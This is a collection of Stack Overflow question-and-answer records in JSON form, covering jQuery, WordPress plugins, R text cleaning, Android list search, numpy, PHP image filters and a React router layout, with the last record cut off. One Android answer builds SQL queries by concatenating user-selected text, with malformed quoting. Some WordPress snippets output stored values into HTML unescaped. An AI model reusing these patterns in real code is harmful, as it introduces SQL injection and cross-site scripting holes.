;-)\nTry this :\n<code>$(document).ready(function(){\n var inProgress = false;\n\n $(\"#stop\").click(function() {\n inProgress = false;\n });\n\n $(\"#start\").click(function() {\n inProgress = true;\n refresh();\n });\n\n function refresh() { \n $('#textarea').html($('#textarea').val()+sometext+'\\n');\n $.ajax({url: 'http:\/\/example.com'})\n .done(function(data, textStatus, jqXHR) {\n $('#textarea').html($('#textarea').val()+someresult+'\\n');\n if (inProgress) refresh();\n });\n }\n});\n<\/code>\nAnswer: Probably because the browser is busy doing requests and it cannot listen other events. Try to put the code in a function and then use the \n<code>setTimeout( function_reference, timeoutMillis );\n<\/code>\nwith a reasonable timeout.\nSee this code as an example:\n<code>function startTime() {\n var today = new Date();\n var h = today.getHours();\n var m = today.getMinutes();\n var s = today.getSeconds();\n \/\/ add a zero in front of numbers<10\n m = checkTime(m);\n s = checkTime(s);\n document.getElementById(\"txt\").innerHTML = h+ \":\" + m + \":\" + s;\n t = setTimeout(function(){startTime()}, 500);\n}\n\nfunction checkTime(i) {\n if (i<10) {\n i = \"0\" + i;\n }\n return i;\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to do ajax request and html element update in background?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Skrollr: manipulate html5 data attributes\n\nQuestion: I've written a Javascript\/jQuery function for dynamically writing HTML5 data attributes into some HTML tags and making Skrollr plugin work. I am unable to use jQuery .data() because it only stores (it does not write inside the tags) attributes. Here is my code:\n<code>parallaxData();\nwindow.addEventListener('resize', parallaxData);\n\nfunction parallaxData(){\n\n if ($(window).width() > 768 && imgContainer.length) { \n\n var imgContainerJS = document.getElementById('big-image'),\n captionJS = document.getElementById('caption'),\n headerJS = document.getElementById('header'); \n\n imgContainerJS.dataset.top = 'transform:translateY(0px);'\n imgContainerJS.dataset.topBottom = 'transform:translateY(' + '-' + imgHeight\/4 + 'px);' \n captionJS.dataset.anchorTarget = \"#big-image-wrap\"\n captionJS.dataset.top = 'transform:translateY(0px);' \n captionJS.dataset.topBottom = 'transform:translateY(' + '-' + imgHeight\/8 + 'px);'\n headerJS.dataset.anchorTarget = \"#big-image-wrap\"\n headerJS.dataset.top = 'transform:translateY(0px);' \n headerJS.dataset.topBottom = 'transform:translateY(' + '-' + imgHeight\/4 + 'px);' \n\n var animDone = false;\n skrollr.init({\n forceHeight: false,\n smoothScrolling: false, \n render: function() {\n if ( header.hasClass('skrollable-after') ) {\n if ( ! 
animDone ) {\n animDone = true;\n header.addClass('fixed-header').css({\n 'display' : 'none'\n }).fadeIn(300); \n }\n } else {\n animDone = false;\n header.removeClass('fixed-header');\n }\n } \n }).refresh();\n\n imgCaption.css({ position: 'fixed' });\n singleImg.css({ position: 'fixed' });\n\n } else if ($(window).width() > 768) {\n\n $('#content').css({ marginTop: headerHeight + 'px' });\n imgCaption.css({ position: 'fixed' });\n singleImg.css({ position: 'fixed' });\n\n } else {\n\n skrollr.init().destroy();\n $('#content').css({ marginTop: 0 + 'px' });\n\n var parallaxEls = $('header, #big-image, #caption'),\n attrs = parallaxEls[0].attributes,\n name,\n index;\n for (index = attrs.length - 1; index >= 0; --index) {\n name = attrs[index].nodeName;\n if (name.substring(0, 5) === \"data-\") {\n parallaxEls.removeAttr(name);\n }\n } \n\n parallaxEls.css({\n '-webkit-transform' : '',\n '-moz-transform' : '',\n 'transform' : '',\n 'backgroundPosition' : ''\n }).removeClass('skrollable-after');\n\n imgCaption.css({ position: 'absolute' });\n singleImg.css({ position: 'absolute' });\n\n }\n\n}\n<\/code>\nI am wondering if there's a chance to achieving the same result only using jQuery, also because I need to select elements by class and not by ID.\nAnswer: I tried it with jQuery. It is possible to add attributes to img or div or whatever.\nhttp:\/\/api.jquery.com\/attr\/#attr-attributeName-value \n<code>$(document).ready(function(){\n $(\".yourclass\").attr({\n \"data-450\": \"exampleCSS:examplechange;\",\n \"data-500\": \"exampleCSS:examplechange;\"});\n});\n<\/code>\nI tried it with one of my div's from my code and the element is not visible, but the attributes are added, I can see it in firebug\n\nThe other divs are still scrolling so I messed it up somewhere else. \n\nHope it helped you (even when you asked months ago). If you already found an answer, please share your solution\nComment: Yes, in the end I've used .attr\n\nThanks anyway!\n","meta":{"source":"stackoverflow","title":"Skrollr: manipulate html5 data attributes","dup_signals":{}},"subset":"stackexchange"} +{"text":"I can't remove \u2022 and some other special characters such as '- using tm_map\n\nQuestion: I search through the questions and able to replace \u2022 in my first set of command.\nBut when I apply to my corpus, it doesn't work, the \u2022 still appear.\nThe corpus has 6570 elements,2.3mb, so it seems to be valid.\n<code>> x <- \". R Tutorial\"\n> gsub(\"\u2022\",\"\",x)\n[1] \". R Tutorial\"\n\n> removeSpecialChars <- function(x) gsub(\"\u2022\",\"\",x)\n> corpus2=tm_map(corpus2, removeSpecialChars)\n> print(corpus2[[6299]][1])\n[1] \"\u2022 R tutorial \u2022 success\u2013 october\"\n> ##remove special characters\n<\/code>\nComment: Your first call to `gsub()` didn't illustrate the point, because `\u2022` was missing from `x`. But that aside, I tested it and it worked. I don't know what your actual problem is.\nComment: My problem is when it's simply the first call, the gsub function work. 
But when I apply it in my code in the second call with tm_map and corpus, it can't remove the \u2022\nComment: Probably another encoding issue.\nAnswer: How about this for an alternative that works in a more straightforward way with corpus objects?\n<code>require(quanteda)\nrequire(magrittr)\n\ncorpus3 <- corpus(c(\"\u2022 R Tutorial\", \"More of these \u2022 characters \u2022\", \"Tricky \u2022!\"))\n\n# remove the character from the tokenized corpus\ntokens(corpus3)\n## tokens from 3 documents.\n## text1 :\n## [1] \"R\" \"Tutorial\"\n## \n## text2 :\n## [1] \"More\" \"of\" \"these\" \"characters\"\n## \n## text3 :\n## [1] \"Tricky\" \"!\" \ntokens(corpus3) %>% tokens_remove(\"\u2022\")\n## tokens from 3 documents.\n## [1] \"R\" \"Tutorial\"\n## text1 :\n## \n## text2 :\n## [1] \"More\" \"of\" \"these\" \"characters\"\n## \n## text3 :\n## [1]] \"Tricky\" \"!\" \n\n# remove the character from the corpus itself\ntexts(corpus3) <- gsub(\"\u2022\", \"\", texts(corpus3), fixed = TRUE)\ntexts(corpus3)\n## text1 text2 text3 \n## \" R Tutorial\" \"More of these characters \" \"Tricky !\" \n<\/code>\n","meta":{"source":"stackoverflow","title":"I can't remove \u2022 and some other special characters such as '- using tm_map","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to add the media uploader in wordpress plugin\n\nQuestion: I read out some of the tutorial for how to integrate the media uploader in wordpress plugins. I do the media uploader based on the tutorial. \nhttp:\/\/wordpress.org\/support\/topic\/howto-integrate-the-media-library-into-a-plugin?replies=4\n I do this and it perfectly working. When i tried the same script again for multiple times of media uploader, Here is the fiddle i tried simply changed the id of the particular text field.\nhttp:\/\/jsfiddle.net\/UrXPe\/1\/ \nStill when i click the upload all is to be to done perfect. only thing if i click <code>insert into post<\/code> it url of the image appear in the second browse field. Here is the screenshot what i face exactly.\n\nWhen i click the first upload field (uploading process are success) after insert into post that corresponding media url is appear in the second field not in first. I am not sure where is the problem any suggestion would be great.\nAnswer: UPDATED - scroll down\nAfter too much of hard work and research and some customization I coded below compact few lines of code to use media uploader anywhere in wordpress. 
Just put code in some function and call that function wherever you want.\nThe path of uploaded\/selected file will be copied to text-box and then you can use it.\n<code>\/\/ jQuery\nwp_enqueue_script('jquery');\n\/\/ This will enqueue the Media Uploader script\nwp_enqueue_media();\n?>\n <div>\n <label for=\"image_url\">Image<\/label>\n <input type=\"text\" name=\"image_url\" id=\"image_url\" class=\"regular-text\">\n <input type=\"button\" name=\"upload-btn\" id=\"upload-btn\" class=\"button-secondary\" value=\"Upload Image\">\n \n<\/div>\n<script type=\"text\/javascript\">\njQuery(document).ready(function($){\n $('#upload-btn').click(function(e) {\n e.preventDefault();\n var image = wp.media({ \n title: 'Upload Image',\n \/\/ mutiple: true if you want to upload multiple files at once\n multiple: false\n }).open()\n .on('select', function(e){\n \/\/ This will return the selected image from the Media Uploader, the result is an object\n var uploaded_image = image.state().get('selection').first();\n \/\/ We convert uploaded_image to a JSON object to make accessing it easier\n \/\/ Output to the console uploaded_image\n console.log(uploaded_image);\n var image_url = uploaded_image.toJSON().url;\n \/\/ Let's assign the url value to the input field\n $('#image_url').val(image_url);\n });\n });\n});\n<\/script>\n<\/code>\nUPDATE: Just to add. You may need to add the function wrapper in your plugin\/theme file. This is the following:\n<code>\/\/ UPLOAD ENGINE\nfunction load_wp_media_files() {\n wp_enqueue_media();\n}\nadd_action( 'admin_enqueue_scripts', 'load_wp_media_files' );\n<\/code>\nThis will call the relevant JS files and CSS files if WP fails to load the upload manager. This also removes console warnings.\nComment: Thank you for this answer. I tried it on a popup but it didn't work: http:\/\/stackoverflow.com\/questions\/30500327\/launching-media-uploader-in-wordpress-from-another-popup .\nComment: Hello can u tell me how can I store this image path to database of word press and retrieve this image later on\nComment: thanks user3337553! @rupesh store it as a custom option, have a look here http:\/\/tinyurl.com\/pz3v9jx\nComment: Any way to force this to default to the upload view instead of whatever view was used last? Awesome code btw. Thank you.\nComment: This works like a charm for one image, but how do you do multiples? I enables the multiple: true, which seems to allow multiple selected, but how can I make those image URIs show up in other text boxes?\nComment: Removing .first() from image.state().get('selection'), convert to JSON and then loop through uploaded_image variable should do the trick. @Articulous\nAnswer: I'm using this method to use media uploader into my custom plugin.May be this would be help.\nin the main theme file(index.php) add these.\n<code>wp_enqueue_style('thickbox'); \/\/ call to media files in wp\nwp_enqueue_script('thickbox');\nwp_enqueue_script( 'media-upload'); \n\n\/\/ load script to admin\nfunction wpss_admin_js() {\n $siteurl = get_option('siteurl');\n $url = $siteurl . '\/wp-content\/plugins\/' . basename(dirname(__FILE__)) . 
'\/js\/admin_script.js';\n echo \"<script type='text\/javascript' src='$url'><\/script>\"; \n}\n add_action('admin_head', 'wpss_admin_js');\n<\/code>\n\nIn the admin_script.js file,\n<code>jQuery('#wpss_upload_image_button').click(function() {\n formfield = jQuery('#wpss_upload_image').attr('name');\n tb_show('', 'media-upload.php?type=image&TB_iframe=true');\n return false;\n});\n\nwindow.send_to_editor = function(html) {\n imgurl = jQuery('img',html).attr('src');\n jQuery('#wpss_upload_image').val(imgurl);\n tb_remove();\n\n jQuery('#wpss_upload_image_thumb').html(\"<img height='65' src='\"+imgurl+\"'\/>\");\n}\n<\/code>\nadmin file(admin_settings.php),\n<code><div id=\"wpss_upload_image_thumb\" class=\"wpss-file\">\n <?php if(isset($record->security_image) && $record->security_image !='') { ?>\n <img src=\"<?php echo $record->security_image;?>\" width=\"65\"\/><?php } else { echo $defaultImage; } ?>\n<\/div>\n<input id=\"wpss_upload_image\" type=\"text\" size=\"36\" name=\"wpss_upload_image\" value=\"\" class=\"wpss_text wpss-file\" \/>\n<input id=\"wpss_upload_image_button\" type=\"button\" value=\"Upload Image\" class=\"wpss-filebtn\" \/>\n<\/code>\nMore details in my blog\nComment: You can follow this instructions.http:\/\/stackoverflow.com\/questions\/17320802\/how-can-i-use-multi-media-uploader-in-the-wordpress-plugins\nComment: How do you use this for multiple uploading?\nComment: Any idea on how I can remedy my situation inside a popup, @SumithHarshan? http:\/\/stackoverflow.com\/questions\/30500327\/launching-media-uploader-in-wordpress-from-another-popup\nComment: thickbox is deprecated and should not be used.\nAnswer: Use this in your custom plugin \n<code><label for=\"upload_image\">\n <input id=\"upload_image\" type=\"text\" size=\"36\" name=\"ad_image\" value=\"http:\/\/\" \/> \n <input id=\"upload_image_button\" class=\"button\" type=\"button\" value=\"Upload Image\" \/>\n <br \/>Enter a URL or upload an image\n<\/label>\n\n<?php\nadd_action('admin_enqueue_scripts', 'my_admin_scripts');\n\nfunction my_admin_scripts() {\n if (isset($_GET['page']) && $_GET['page'] == 'my_plugin_page') {\n wp_enqueue_media();\n wp_register_script('my-admin-js', WP_PLUGIN_URL.'\/my-plugin\/my-admin.js', array('jquery'));\n wp_enqueue_script('my-admin-js');\n }\n}\n\n?>\n\n<script>\n jQuery(document).ready(function($){\n\n var custom_uploader;\n\n $('#upload_image_button').click(function(e) {\n\n e.preventDefault();\n\n \/\/If the uploader object has already been created, reopen the dialog\n if (custom_uploader) {\n custom_uploader.open();\n return;\n }\n\n \/\/Extend the wp.media object\n custom_uploader = wp.media.frames.file_frame = wp.media({\n title: 'Choose Image',\n button: {\n text: 'Choose Image'\n },\n multiple: true\n });\n\n \/\/When a file is selected, grab the URL and set it as the text field's value\n custom_uploader.on('select', function() {\n console.log(custom_uploader.state().get('selection').toJSON());\n attachment = custom_uploader.state().get('selection').first().toJSON();\n $('#upload_image').val(attachment.url);\n });\n\n \/\/Open the uploader dialog\n custom_uploader.open();\n\n });\n\n});\n <\/script>\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to add the media uploader in wordpress plugin","dup_signals":{}},"subset":"stackexchange"} +{"text":"Update XML file\n\nQuestion: I want to replace an XML node that is not a child of the root element. 
How can I do it - not in .NET 3.5?\nI don't know the exact path to the node I want to replace, I get the node by XPath query like:\n<code>XmlElement root = doc.DocumentElement;\noldItem = root.SelectSingleNode(\"\/\/Node1[@name='aaa']\/\/Node2[Item='bbb']\/Value\");\n<\/code>\nHow can I replace this old item?\nComment: what do you want to replace **exactly**? give a before-after example.\nAnswer: Use <code>root.SelectSingleNode(\"query\").Value = [New value]<\/code>\n","meta":{"source":"stackoverflow","title":"Update XML file","dup_signals":{}},"subset":"stackexchange"} +{"text":"Android: Searching in list using array adapter\n\nQuestion: My problem here is when I scroll the words manually select it from the list, it correctly displays the definition. However, when I type it and search for the definition, it always shows the first item of my list. I'm currently learning android by going through tutorials and came across this example but couldn't fix the bug. Here is my code:\nHere's my output picture\n<code>public class DbBackend extends DbObject{\n\n public DbBackend(Context context) {\n super(context);\n }\n\n public String[] dictionaryWords(){\n String query = \"Select * from dictionary\";\n Cursor cursor = this.getDbConnection().rawQuery(query, null);\n ArrayList<String> wordTerms = new ArrayList<String>();\n if(cursor.moveToFirst()){\n do{\n String word = cursor.getString(cursor.getColumnIndexOrThrow(\"word\"));\n wordTerms.add(word);\n }while(cursor.moveToNext());\n }\n cursor.close();\n String[] dictionaryWords = new String[wordTerms.size()];\n dictionaryWords = wordTerms.toArray(dictionaryWords);\n return dictionaryWords;\n }\n\n\/\/\n\/\/ public int getIndexByValue(String value){\n\/\/ S\n\/\/ }\n public QuizObject getQuizById(int quizId){\n\n QuizObject quizObject = null;\n String query = \"select * from dictionary where _id = \" + quizId;\n Cursor cursor = this.getDbConnection().rawQuery(query, null);\n if(cursor.moveToFirst()){\n do{\n String word = cursor.getString(cursor.getColumnIndexOrThrow(\"word\"));\n String meaning = cursor.getString(cursor.getColumnIndexOrThrow(\"meaning\"));\n quizObject = new QuizObject(word, meaning);\n }while(cursor.moveToNext());\n }\n cursor.close();\n return quizObject;\n }\n}\n<\/code>\nHere's the Dictionary activity \n<code>public class DictionaryActivity extends ActionBarActivity {\n\n private TextView wordMeaning;\n private TextToSpeech convertToSpeech;\n\n @Override\n protected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n setContentView(R.layout.activity_dictionary);\n\n Intent intent = getIntent();\n Bundle bundle = intent.getExtras();\n int dictionaryId = bundle.getInt(\"DICTIONARY_ID\");\n int id = dictionaryId + 1;\n\n TextView word = (TextView)findViewById(R.id.word);\n wordMeaning = (TextView)findViewById(R.id.dictionary);\n Button textToSpeech = (Button)findViewById(R.id.button);\n\n DbBackend dbBackend = new DbBackend(DictionaryActivity.this);\n QuizObject allQuizQuestions = dbBackend.getQuizById(id);\n\n word.setText(allQuizQuestions.getWord());\n wordMeaning.setText(allQuizQuestions.getDefinition());\n\n }\n<\/code>\nAnother class\n<code>public class MainActivity extends ActionBarActivity {\n\n private EditText filterText;\n private ArrayAdapter<String> listAdapter;\n\n @Override\n protected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n setContentView(R.layout.activity_main);\n\n filterText = (EditText)findViewById(R.id.editText);\n ListView itemList = 
(ListView)findViewById(R.id.listView);\n\n DbBackend dbBackend = new DbBackend(MainActivity.this);\n String[] terms = dbBackend.dictionaryWords();\n\n listAdapter = new ArrayAdapter<String>(this, android.R.layout.simple_list_item_1, android.R.id.text1, terms);\n\n itemList.setAdapter(listAdapter);\n itemList.setOnItemClickListener(new AdapterView.OnItemClickListener() {\n @Override\n public void onItemClick(AdapterView<?> parent, View view, int position, long id) {\n \/\/ make Toast when click\n Toast.makeText(getApplicationContext(), \"Position \" + position, Toast.LENGTH_LONG).show();\n\n Intent intent = new Intent(MainActivity.this, DictionaryActivity.class);\n intent.putExtra(\"DICTIONARY_ID\", id);\n startActivity(intent);\n }\n });\n<\/code>\nComment: Searching by word itself would work, and I believe this is what Juan Salamanca's answer suggests. The problem is `ArrayAdapter` uses the `position` as the id, so the `id` you are given is not the id of the row in the database for that word. If you had a wrapper class to contain the word and it's database id, and stored that in the adapter instead, you could make `getitemId` return the proper id. But you would have to modify the adapter a lot more, at which point I'd say extend `BaseAdapter` instead of `ArrayAdapter` (I almost never use `ArrayAdapter` for reasons like this one).\nComment: There's a lot of code here, much of which seems unrelated to your problem. Please try to narrow down what part of the code doesn't seem to be doing what you intend it to. If you can't narrow it down from all of what you posted, that suggests you haven't really spent enough time trying to solve it. A good place to start would be the place where the item is clicked.\nComment: My apologies for copy pasting everything. I have narrow down the code now.I tried looking into the code I found out that the position of my list is not moving. No matter what I search for, my MainAcitivity class is always sending a position value of zero to another display activity, and displays the first item from the list. Perhaps, the value of position hasn't been updated. Should I pass the id instead of position?\nComment: The position refers to where it is in the adapter, not where it is in your database. When the list is filtered, the adapter saves away the original list and swaps it with a list that has only the items matching the filter term. The adapter is correctly reporting that the position is zero. 
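As one illustration of identifying the clicked data by something other than its position (the names below are only a sketch, not from the original code), a small wrapper can keep each word together with its database id:\n<code>class DictionaryEntry {\n    final long dbId;\n    final String word;\n\n    DictionaryEntry(long dbId, String word) {\n        this.dbId = dbId;\n        this.word = word;\n    }\n\n    \/\/ ArrayAdapter displays items and filters them by toString(),\n    \/\/ so returning the word keeps both the list and the search working\n    @Override\n    public String toString() {\n        return word;\n    }\n}\n<\/code>\nWith an ArrayAdapter<DictionaryEntry>, onItemClick can then read ((DictionaryEntry) parent.getItemAtPosition(position)).dbId and pass that to the detail activity.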
Since positions do not identify data, you need to use something else to identify the data at that position.\nComment: Okay so you are saying I should retrieve the word by using id instead of position?\nComment: I was thinking may be I should change my query and search for word instead of id by doing this.\nComment: String query = \"select * from dictionary where word = \" + editText; and retrieve values.\nComment: Okay I tried this line of code in onItemClick: String selected = terms[position]; intent.putExtra(\"DICTIONARY_ID\", selected); and also changed the query to String query = \"select * from dictionary where word = '\" + quizId; But it gave this error message : QuizObject.getWord()' on a null object\nAnswer: In this part try to get the word not the id\n<code>public void onItemClick(AdapterView<?> parent, View view, int position, long id) {\n \/\/ make Toast when click\n Toast.makeText(getApplicationContext(), \"Position \" + position, Toast.LENGTH_LONG).show();\n String selectedText = (String) parent.getItemAtPosition(position);\n Intent intent = new Intent(MainActivity.this, DictionaryActivity.class);\n intent.putExtra(\"DICTIONARY_ID\", selectedText);\n startActivity(intent);\n }\n<\/code>\nand the query \n<code>String query = \"select * from dictionary where _id = \" + quizId;\n<\/code>\nreplace by\n<code>String query = \"select * from dictionary where word = '\" + quizId + \"';\n<\/code>\nremenber the quizId now is the word in the position of your list,\nComment: Isn't it same to pass either id or word since both are from the same row?\nComment: So you are saying to do this ? String selected = terms[position]; intent.putExtra(\"DICTIONARY_ID\", selected);\nComment: When I changed the query to word, it is throwing this error message QuizObject.getWord()' on a null object reference\nComment: try with the view\nComment: Do you mean the textview?\nComment: im sorry yes.. 
try with the view in setOnItemClickListener TextView = (TextView) view.findViewById(android.R.id.text1); try to get the text of the item and pass to the query\nComment: I'm sorry how do I get the text of the item and pass it to query?\nComment: use this String str = ((TextView)view ).getText().toString(); in setonitemclicklistener metod the full answer is this http:\/\/stackoverflow.com\/questions\/11683547\/getting-a-string-from-a-listview-item-in-setonitemclicklistener\nComment: I tried this code from the link you directed me TextView textView = (TextView) view.findViewById(android.R.id.text1);\n LinearLayout row = (LinearLayout)((LinearLayout)view).getChildAt(0);\n textView = (TextView)row.getChildAt(0);\n String text = textView.getText().toString(); I got this error message : java.lang.ClassCastException: android.widget.TextView cannot be cast to android.widget.LinearLayout\nComment: intent.putExtra(\"DICTIONARY_ID\",text); \/\/ The text was passed onto another activity like this\n","meta":{"source":"stackoverflow","title":"Android: Searching in list using array adapter","dup_signals":{}},"subset":"stackexchange"} +{"text":"Get the indices of min values for each row in a 2D np.array, if the min value satisfies a condition\n\nQuestion: I've a 2D <code>np.array<\/code> with dimension <code>1000 (rows) x 12 (columns)<\/code>.\nI need to get the indices of those values that are below <code>1.5<\/code>.\nIf a row contains more than one value that satisfies this condition, then I need to keep only the indices of the lowest.\nI'd be quite happy with using \n<code>idx1,idx2=np.where(x < 1.5)<\/code>,\n but this sometimes returns several indices that are in the same rows.\nI could of course loop over all repeated rows in <code>idx1<\/code> and keep only the indices whose values in <code>x<\/code> where are the lowest, but I was wondering if there's a more pythonic way.\nThanks\nComment: What if a row does not contain any value below 1.5? Do you just skip the row?\nComment: @jdehesa yes, then I'm no interested in that row. Only in the row-column indexes that are below 1.5, provided they are the lowest of their row\nAnswer: You can just do this:\n<code># First index is all rows\nidx1 = np.arange(len(x))\n# Second index is minimum values\nidx2 = np.argmin(m, axis=1)\n# Filter rows where minimum is not below threshold\nvalid = x[idx1, idx2] < 1.5\nidx1 = idx1[valid]\nidx2 = idx2[valid]\n<\/code>\nAnswer: One way would be to use a numpy masked array. Lets define the following random <code>ndarray<\/code>:\n<code>a = np.random.normal(1,2,(4,2))\n\nprint(a.round(2))\narray([[ 1.41, -0.68],\n [-1.53, 2.74],\n [ 1.19, 2.66],\n [ 2. 
, 1.26]])\n<\/code>\nWe can define a masked array with:\n<code>ma = np.ma.array(a, mask = a >= 1.5)\n\nprint(ma.round(2))\n[[1.41 -0.68]\n [-1.53 --]\n [1.19 --]\n [-- 1.26]]\n<\/code>\nIn order to deal with rows with no values bellow the threshold, you could do:\n<code>m = ma.mask.any(axis=1)\n# array([ True, True, True, True])\n<\/code>\nWhich will contain a <code>False<\/code> if there are no valid values along a given row.\nAnd then take the <code>np.argmin<\/code> over the masked array to get the columns with the minimum values bellow 1.5:\n<code>np.argmin(ma, axis=1)[m]\n# array([1, 0, 0, 1])\n<\/code>\nAnd for the rows you could do:\n<code>np.flatnonzero(m)\n# array([0, 1, 2, 3])\n<\/code>\n","meta":{"source":"stackoverflow","title":"Get the indices of min values for each row in a 2D np.array, if the min value satisfies a condition","dup_signals":{}},"subset":"stackexchange"} +{"text":"IMG_FILTER_COLORIZE not working as it should\n\nQuestion: I am trying to turn a PNG image with a white box to a green box. The background of the PNG is transparent.\nI have written out code but it doesn't work for some reason. I have looked and tried a lot of things and i cannot see anything wrong with the code.\nThanks\n<code>header(\"Content-type: image\/png\");\n$image = imagecreatefrompng($filename);\nimagefilter($image, IMG_FILTER_COLORIZE, 0, 255, 0, 100);\nimagesavealpha($image, TRUE);\nimagepng($image, $save_filename); \n<\/code>\nThe image gets exported still with a white box. Will IMG_FILTER_COLORIZE not work with white?\nThanks\nAnswer: I have fixed this issue. To anyone in the future...\nI added \n<code>imagefilter($image, IMG_FILTER_NEGATE); \n<\/code>\nBefore image_filter(\n","meta":{"source":"stackoverflow","title":"IMG_FILTER_COLORIZE not working as it should","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I add React router to the content section in the main layout?\n\nQuestion: I am developing application using React redux-toolkit. I added the route schema, and then I get the 'wow' error saying the page can't respond when it probably goes into an infinite loop. I have a MainLayout and I want to go to the content part of it by clicking the properties of the layout in the side menu. For example, the page that gives the list of registered cities when I click, the page that gives the names of the countries. I want to give these pages in the content section of the main layout. That's why I need to give you the route diagram that I have prepared. Since I also wrap routes in the app, I think it goes into an infinite loop because it wraps the route part twice, but I don't know how I can solve it. 
I need help.\n<code>function AppRoutes() {\n return (\n <Routes>\n <Route element={<PrivateRoutes><MainLayout\/><\/PrivateRoutes>} path=\"\/\">\n {\/* <Route element={<MainLayout\/>} path=\"\/\"\/> *\/}\n <\/Route>\n <Route element={<Login\/>} path=\"\/login\"\/>\n <Route element={<CityList\/>} path=\"\/city\/list\"\/>\n <Route element={<Register\/>} path=\"\/register\"\/>\n <Route element={<ActivateEmail\/>} path=\"\/account\/activate\"\/>\n <Route element={<NoMatch\/>} path=\"*\"\/>\n <\/Routes>\n )\n}\n\nexport default AppRoutes\n\nconst PrivateRoutes = ({children}) => {\n const {userToken } = useSelector((state) => state.auth);\nif(!userToken){\nreturn <Navigate to=\"\/login\"\/>\n}else{\n return children;\n}\n}\n\nexport default PrivateRoutes;\n\nfunction App() {\n const [locale, setLocale] = useState('tr');\n return (\n <IntlProvider locale={locale} messages={messages[locale]}>\n <AppRoutes\/>\n <\/IntlProvider>\n );\n};\n\nexport default App\n\nimport { UserOutlined, FileOutlined, SettingOutlined, DownOutlined, LogoutOutlined } from \"@ant-design\/icons\";\nimport { Breadcrumb, Layout, Menu, theme, Input, Space, Card, Button, Dropdown, message, Tag, Spin, Row, Col, Form } from \"antd\";\nimport { useState, useEffect } from \"react\";\nimport { RiLockPasswordLine } from 'react-icons\/ri'\nimport {AiOutlineMenu} from 'react-icons\/ai'\nimport { useDispatch, useSelector } from \"react-redux\";\nimport { getUserbyId, signOut } from \"..\/utils\/api.service\";\nimport { useNavigate } from 'react-router-dom';\nimport { getTokenSub } from '..\/utils\/HelperFunctions';\nimport { getUser, userInfo } from '..\/types\/user';\nimport { useIntl } from \"react-intl\";\nimport AppRouteList from \"..\/routes\/AppRouteList\";\nimport FormButton from \"..\/components\/FormButton\";\nimport InputDisableText from \"..\/components\/InputDisableText\";\nimport AppRoutes, { RouteApp } from \"..\/routes\/AppRoutes\";\n\nconst { Header, Content, Footer, Sider } = Layout;\n\nexport function MainLayout() {\n const {userToken } = useSelector((state) => state.auth);\n const intl = useIntl();\n const navigate = useNavigate();\n const menuItemClick = (e) => {\n switch(e.key){\n case \"menu_city_list\":\n navigate(\"\/city\/list\")\n break;\n default:\n break;\n }\n }\n \n function getItem(label, key, icon, children) {\n return {\n key,\n icon,\n children,\n label,\n };\n }\n const items = [\n getItem(\"Faturalar\", \"sub1\", <FileOutlined \/>, [\n getItem(\"Team 1\", \"1\"),\n getItem(\"Team 2\", \"2\"),\n ]),\n getItem(\"Sistem Ayarlar\u0131\", \"sub2\", <SettingOutlined \/>, [\n getItem(\"\u00dclkeler\", \"5\"),\n getItem(intl.formatMessage({id:\"menu_city_list\"}),\"menu_city_list\",<AiOutlineMenu\/>),\n getItem(\"Client\", \"7\"),\n getItem(\"Tom\", \"8\"),\n getItem(\"Bill\", \"9\"),\n getItem(\"Alex\", \"10\"),\n getItem(\"Tom\", \"11\"),\n \/\/ getItem(\"Bill\", \"12\"),\n \/\/ getItem(\"Alex\", \"13\"),\n \/\/ getItem(\"Tom\", \"14\"),\n getItem(\"Genel Ayarlar\", \"15\"),\n ]),\n getItem(\"Hesab\u0131m\", \"sub3\", <UserOutlined \/>, [\n getItem(\"Hesab\u0131m\", \"3\"),\n getItem(\"Oturum Kapat\", \"4\"),\n ]),\n ];\n const handleButtonClick = (e) => {\n message.info('Click on left button.');\n console.log('click left button', e);\n };\n const handleMenuClick = (e) => {\n message.info('Click on menu item.');\n console.log('click', e);\n };\n const [isLoading, setIsLoading] = useState(false);\n const token = localStorage.getItem('userToken');\n const sub = getTokenSub(token);\n const dispatch = 
useDispatch();\n getUser.Id = sub\n\n useEffect(() => {\n dispatch(getUserbyId(getUser)).then((result) => { \n userInfo.id = result.payload.id\n userInfo.clientId = result.payload.clientId\n userInfo.clientName = result.payload.clientName\n userInfo.email = result.payload.email\n userInfo.firstName = result.payload.firstName\n userInfo.lastName = result.payload.lastName\n userInfo.isActive = result.payload.isActive\n userInfo.normalizedEmail = result.payload.normalizedEmail\n userInfo.userName = result.payload.userName\n userInfo.passwordChangeTime = result.payload.passwordChangeTime\n });\n }, [dispatch, getUser])\n\n useEffect(() => {\n setIsLoading(true);\n setTimeout(() => {\n setIsLoading(false);\n }, 1000);\n }, []);\n\n const handleLogout = () => {\n dispatch(signOut())\n };\n const itemsDropDown = [\n {\n label: 'Hesab\u0131m',\n key: '100',\n icon: <UserOutlined \/>,\n },\n {\n label: '\u015eifremi De\u011fi\u015ftir',\n key: '200',\n icon: <RiLockPasswordLine \/>,\n },\n {\n label: 'Oturum Kapat',\n key: '400',\n icon: <LogoutOutlined \/>,\n danger: true,\n onClick: handleLogout\n },\n ];\n\n const menuProps = {\n items: itemsDropDown,\n \/\/ onClick: handleMenuClick,\n };\n const [collapsed, setCollapsed] = useState(false);\n const {\n token: { colorBgContainer },\n } = theme.useToken();\n \n\n return (\n <div style={{ display: 'flex', justifyContent: 'center', alignItems: 'center', height: '100vh' }}>\n {isLoading ? (\n <Spin size=\"large\" \/>\n ) : (\n <Layout\n style={{\n minHeight: \"100vh\",\n }}\n >\n {console.log(\"user \u0131nfo\", userToken)}\n <Sider\n collapsible\n collapsed={collapsed}\n onCollapse={(value) => setCollapsed(value)}\n >\n <div\n style={{\n height: 32,\n margin: 16,\n background: \"rgba(255, 255, 255, 0.8)\",\n }}\n >\n <\/div>\n <Menu\n theme=\"dark\"\n defaultSelectedKeys={[\"1\"]}\n mode=\"inline\"\n items={items}\n onClick={menuItemClick}\n \/>\n <\/Sider>\n <Layout className=\"site-layout\">\n <Header\n style={{\n padding: 0,\n background: colorBgContainer,\n }}\n >\n <\/Header>\n <Content\n style={{\n margin: \"0 16px\",\n }}\n >\n {\/* <AppRoutes\/> PROBLEM HERE *\/} \n\n <\/div>\n <\/Content>\n <Footer\n <\/Footer>\n 